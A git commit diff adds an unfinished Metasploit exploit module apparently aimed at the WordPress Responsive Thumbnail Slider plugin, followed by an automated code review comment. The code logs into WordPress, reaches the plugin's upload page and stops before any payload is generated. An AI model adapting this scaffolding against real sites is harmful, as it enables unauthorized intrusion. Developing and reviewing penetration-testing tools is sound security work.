authenticating to WordPress

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-25 14:22:24 -05:00
parent 668bcb38cb
commit 8f89275df8
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 58 additions and 1 deletions


@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
# check for WordPress
# check if plugin is installed
end end
# log into Wordpress # log into Wordpress
# access 'manage images' page # access 'manage images' page
# upload file # upload file
def exploit def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => wp_uri
)
if res && res.body.include?("WordPress") && res.body.include?("200")
print_status("WordPress accessed")
else
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
end
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
cookies = res.get_cookies
wp_login_res = send_request_cgi(
'method' => 'POST',
'uri' => wp_uri,
'cookie' => cookies,
'vars_post' => {
'log' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'wp-submit' => 'Log In',
'redirect_to' => redirect_uri
}
)
auth_cookies = wp_login_res.get_cookies
auth_res = send_request_cgi(
'method' => 'GET',
'uri' => redirect_uri,
'cookie' => auth_cookies
)
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
print_good("Logged into WordPress")
upload_payload(auth_cookies)
end end
def upload_payload(cookies)
# attempt to access plugins page
plugin_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
'cookie' => cookies
)
unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
end
# generate payload
end
def exploit
login
end
end end
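Review bot: In `login`, `auth_cookies = wp_login_res.get_cookies` dereferences the POST response without checking that one was returned, so a timeout or dropped connection raises NoMethodError on nil instead of a clean failure; a guard such as `fail_with(Failure::Unreachable, "No response to login request") unless wp_login_res` before that line would cover it. The first check in the same method, `res.body.include?("200")`, searches the page body for the text "200" rather than testing the HTTP status, so it can pass or fail for unrelated reasons; `res.code == 200` is presumably what was meant. In `upload_payload`, the query string is embedded in the path handed to `normalize_uri`; passing it as `'vars_get' => { 'page' => 'responsive_thumbnail_slider_image_management' }` keeps path and parameters separate. The class body starts outside the hunk, so whether a WordPress helper mixin is already included cannot be seen from here.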